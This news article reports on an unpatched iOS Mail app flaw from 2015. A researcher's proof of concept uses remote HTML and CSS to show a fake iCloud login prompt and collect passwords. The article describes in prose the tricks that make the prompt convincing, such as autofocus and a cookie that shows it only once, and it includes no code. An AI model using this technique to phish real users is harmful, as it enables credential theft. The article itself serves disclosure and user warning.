Apple users can easily be tricked into sharing their iCloud credentials because of a bug in Apple iOS default Mail application,warns, Jan Soucek, a security researcher.

The flaw was reported by the researcher to Apple itself, back in Januarary 2015 – but the company hasn’t patched it as of now. Now finally the concept code as a proof has been published by Mr. Jan in order to force Apple into fixing the bug.

Now, it’s hilarious that the vulnerability is caused just by a simple fact that HTML tags aren’t ignored in Email messages by Apple’s Mail app.

On GitHub, hosting his PoC-iOS inject-ket, Soucek explained, “This bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password “collector” using simple HTML and CSS”.

A video demonstrating the attack on an iPad and iPhone was published by the researcher too, below is the video for you to have a look:

To be specific in simple words, what needed to be done for launching a successful attack is, the aforementioned HTML tag is sent in an email to target and to a server hosting bogus a bogus login page. Obviously, the bogus pop-up login prompt looks pretty much legitimate to trick the targeted user into filling out their credentials.

Autofocus is enabled for the password field, so as soon as the target clicks on “OK”, the dialogue filed gets hidden. Victims email can also be shown in username field by simply modifying the code.

The code makes use of the cookies to make sure it gets to know if the victim has visited the bogus page already, making it possible for attacker to let the pop-up show only for once and prevent the message to appear for second time. Making it all look really genuine!

It all looks natural because of the fact that Apple OSes tend to keep prompting login forms at random times, and Apple users know that very well – hence, it doesn’t trigger any suspicious move into a user’s mind at first.

As the vulnerability hasn’t been patched by the Apple, the only way users can keep themselves protected is, they shouldn’t fill in their credentials when asked to while having opened an email with Mail app. And in the meantime, we all can hope that Apple will deliver a patch soon to resolve the problem for good!

Leave a comment

Your email address will not be published. Required fields are marked *